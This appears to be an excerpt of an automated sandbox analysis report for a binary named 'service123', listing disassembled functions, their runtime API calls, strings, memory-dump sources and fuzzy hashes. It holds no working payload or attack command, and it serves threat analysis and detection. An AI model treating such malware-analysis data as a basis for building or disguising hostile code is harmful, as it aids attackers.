Opcode Fuzzy Hash: d395db92f0df87ef22c75b857fec07d77531f7c34e7f4a3cfefa9d6d9fc5f694
Instruction Fuzzy Hash: B80171B19093009BC7007FB8A90821DFFF6AB46354F05542DD5899B200E7B198088BA3

Function 6C967170 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C9671C1
strlen.MSVCRT ref: 6C9671DB
strlen.MSVCRT ref: 6C96722B
strlen.MSVCRT ref: 6C967288
strlen.MSVCRT ref: 6C9672DC

Strings

*, xrefs: 6C967410
basic_string::append, xrefs: 6C96747A, 6C967486, 6C967492, 6C96749E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: fae02260b8e0b1023d7aa4c8085b7e88dab8ebe73c06a94bdc836089532671ee
Instruction ID: d400cefd5bb2a0b5aed3d0b5840afb97566be937dbba47e4970c478fe1615bdb
Opcode Fuzzy Hash: fae02260b8e0b1023d7aa4c8085b7e88dab8ebe73c06a94bdc836089532671ee
Instruction Fuzzy Hash: 8EA14DB06086018FE700EF69C18476EBBE2BF55308F55896DD4949FB84DB35D889CB92

Function 6C9E3B80 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C9E3C1F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C97E77E), ref: 6C9E3C83
memmove.MSVCRT ref: 6C9E3CBB
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C97E77E), ref: 6C9E3D2A

Strings

basic_string::_M_replace, xrefs: 6C9E3EAF

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: b20d0c236788bad36823f1c9ebbc53fb750c8eab69c2d148d9c33fde88636364
Instruction ID: ee2575b275684fd587229221c7a31d502b89695e71a9f09845f53546c7301ac6
Opcode Fuzzy Hash: b20d0c236788bad36823f1c9ebbc53fb750c8eab69c2d148d9c33fde88636364
Instruction Fuzzy Hash: CA9135756493558FC701DF28C08082EBBE1BFAD308F55896DE8899B720E774E985CB82

Function 6C94E800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 31fb9838f583064a9496a43bc0a7e40a8b42fc1dae0bdb13bc0cc826762c5aba
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 8321A731958609CFDF10CE29C481A9AF7AAEBE6314B54CA55D49447F18D330E88BC7D6

Function 00661E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00661EAF
signal.MSVCRT ref: 00661EF6
signal.MSVCRT ref: 00661F0F
signal.MSVCRT ref: 00661F36
signal.MSVCRT ref: 00661F72
signal.MSVCRT ref: 00661FBF
signal.MSVCRT ref: 00661FD5
signal.MSVCRT ref: 00661FEB

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 8d980076dadcdd8e392694dde881e86cbb52ad892513be3648337e88d8972d17
Instruction ID: f46ac799b492fc8c6ca87267ae2f78177f052a85d9b3e09256620b3fafd6c2ce
Opcode Fuzzy Hash: 8d980076dadcdd8e392694dde881e86cbb52ad892513be3648337e88d8972d17
Instruction Fuzzy Hash: 4631FBB05482009EE7606F64C95436E76D6AF46358F1D4E0DE8D8CF381CBBEC8899B57

Function 6C954A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C954A48

Strings

@, xrefs: 6C954D17
Inf, xrefs: 6C955505, 6C95551D
NaN, xrefs: 6C95540B

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 23185566ef1320d2d3005433eb5059da00c06c1598a64aca325347701bc82ff5
Instruction ID: b083586cdf259f9035df54645c284fc59677ee1f158df57451e727dc6e457c12
Opcode Fuzzy Hash: 23185566ef1320d2d3005433eb5059da00c06c1598a64aca325347701bc82ff5
Instruction Fuzzy Hash: 1BF1BF7160C3858BD761CF24C44039ABBE5BBC5318F958A1DE8DC8B782D735D92A8F42

Function 00664360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00664378

Strings

Inf, xrefs: 00664E35, 00664E4D
NaN, xrefs: 00664D3B
@, xrefs: 00664647

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 374509d5df64fac70f3d747d31ae6db4ff02e06f51f4a69f25a605b027d69c8e
Instruction ID: 333ac311a04f3fc5a0144216906ca3c38f64ffc032ad1a99a804c6c4e9f4db80
Opcode Fuzzy Hash: 374509d5df64fac70f3d747d31ae6db4ff02e06f51f4a69f25a605b027d69c8e
Instruction Fuzzy Hash: F7F19D7560C3918BD7318F24C4907ABBBE3BF85314F148A2DE9D987381EB359906CB86

Function 6C953830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 6C953AFA
0, xrefs: 6C953B96

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: ca3ad02632180c9fc3224cadd4e9044ce0353102d21d5644f2cb65b2796efa89
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 59C19BB5E042198BDB05CF7CC88078DBBF5BF89314FA98259E858AB785D334E855CB90

Function 00663160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 006634C6
@, xrefs: 0066342A

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 7b909bf14f93f7a12eff3b6408fe7b7911f391992121d7a42a16e6490f24cc55
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: A2C16A71E006658BDB15CF6CC58479DFBF2AF88314F298259E858AB385D734EE41CB90

Function 6C96B5C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C96B5E6
memcmp.MSVCRT ref: 6C96B60A
memcmp.MSVCRT ref: 6C96B67D
memcmp.MSVCRT ref: 6C96B6EF

Part of subcall function 6CA0AB60: strlen.MSVCRT ref: 6CA0AB6E

memcmp.MSVCRT ref: 6C96B787

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C96B631, 6C96B6A2, 6C96B715, 6C96B7AE, 6C96B7CA
basic_string::compare, xrefs: 6C96B629, 6C96B69A, 6C96B70D, 6C96B7A6, 6C96B7C2

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 750e73fe4e7300dc430bb441bad8cb4a9bb9db7c8266e372a78d1a2e9616256e
Instruction ID: 9a0ed577eae5213690fc27abcda4c65358e0f2300dcd5623bf9f842371a70a79
Opcode Fuzzy Hash: 750e73fe4e7300dc430bb441bad8cb4a9bb9db7c8266e372a78d1a2e9616256e
Instruction Fuzzy Hash: 876137B56093119FD300AF2ED99085EBBE6BF99698F55892DF4C887B10E231DC84CB52

Function 6C9674C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9B30D0: memset.MSVCRT ref: 6C9B3115

strcmp.MSVCRT ref: 6C967521
strlen.MSVCRT ref: 6C96753C
strlen.MSVCRT ref: 6C967583
strlen.MSVCRT ref: 6C9675F4
strlen.MSVCRT ref: 6C967662

Strings

*, xrefs: 6C967740

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: edfdc541a586ab4e46044b6533286006f2efeef843edae014bf210f0163ab294
Instruction ID: 3283f724a1ffe969985c571dca08ac824114feae67943023f0371cfd9fb88029
Opcode Fuzzy Hash: edfdc541a586ab4e46044b6533286006f2efeef843edae014bf210f0163ab294
Instruction Fuzzy Hash: 958159B5A05A009FEB00DF29C48865EFBF9FF95304F4185ADD8459BB50D735E80ACB92

Function 6C94E8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 8dfb04b098387f78d43db9f8833bb624b3ff7b99980365d94c5db606aecacaab
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 2E5189715097088FD710CF1AC08065AF7E9BF9A308F44CA5EE8989BB91D330D94ACB96

Function 6C94E340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C94E487
WaitForSingleObject.KERNEL32 ref: 6C94E4C8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 8d0958cf903a91ea6884631d2379857fe8aa02c31e583b20fa65524b86ab314d
Instruction ID: 3fc2b2ac76a74ee0e15062d2e30b31488cc35aae7ad94d3a9e4109ef21bd2e62
Opcode Fuzzy Hash: 8d0958cf903a91ea6884631d2379857fe8aa02c31e583b20fa65524b86ab314d
Instruction Fuzzy Hash: 29513C707053028FEB1ADF3AC584726BBFAAB06718F11C52CD89587B85E730D446CBA2

Function 6C9501F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C950209
memcpy.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6C95022D
malloc.MSVCRT ref: 6C950247
memset.MSVCRT ref: 6C950275
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: 8620994253415a2504d58ad5fb801571b5964154fbd47c24a3fab128e1e40f3a
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: D7119EB66097459FE700EF68D48089AB7E8EF5429CF86893ED848C7B00E730D529CB21

Function 00668120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0066812C
GetProcAddress.KERNEL32 ref: 0066814C
GetProcAddress.KERNEL32 ref: 0066818B

Strings

___lc_codepage_func, xrefs: 00668144
msvcrt.dll, xrefs: 00668125
__lc_codepage, xrefs: 00668180

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 50950fa3e628595d3994d2eaf4d9a705b8e8471db8ded49f255e7f3d4709713c
Instruction ID: 8aba0b21efd509c92f380df10ecf80791c2ff61ddd0a3491970a9b57503ad91e
Opcode Fuzzy Hash: 50950fa3e628595d3994d2eaf4d9a705b8e8471db8ded49f255e7f3d4709713c
Instruction Fuzzy Hash: 0BF062B49482118F9B007F79AD0418BBEE6AB05710F05463DC885D7300EAB59449CFA3

Function 6C959171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C95917C
GetProcAddress.KERNEL32 ref: 6C95919C
GetProcAddress.KERNEL32 ref: 6C9591DB

Strings

msvcrt.dll, xrefs: 6C959175
___lc_codepage_func, xrefs: 6C959194
__lc_codepage, xrefs: 6C9591D0

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 11e8f90ef99a1e7daff7efe7018112b75ce29a001d04f8513be89f708044c45f
Instruction ID: d2fa57d8b9f43ffabd40c870788993157078963a960f175be2ee4d2a9d3301df
Opcode Fuzzy Hash: 11e8f90ef99a1e7daff7efe7018112b75ce29a001d04f8513be89f708044c45f
Instruction Fuzzy Hash: BCF062F19453228FBB04FF7C5A0A25A7BF4A605214F864539C88AC7600E734C562CBA2

Function 6C94EA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: 563bc874f4accf553a970eebd8388001c8777a7db76b83171708742e21425800
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 84B01231CDD7288A4B21D67C0510080B21EE637348745D883C44AA3E04C311E067D162

Function 6C9E4890 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9EB65E), ref: 6C9E4913
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9EB65E), ref: 6C9E4955

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 17d28d7e4ba520e65a1c4a0b6bc4cd20bb1798647576e9449bf3c0ccd94eb342
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 386105B4909701CFC714DF69C18051AFBE4EFA8754F20896EE4A98B761E730E845CF52

Function 6C9E0720 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C979053,00000003), ref: 6C9E079D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C979053,00000003), ref: 6C9E07DC

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
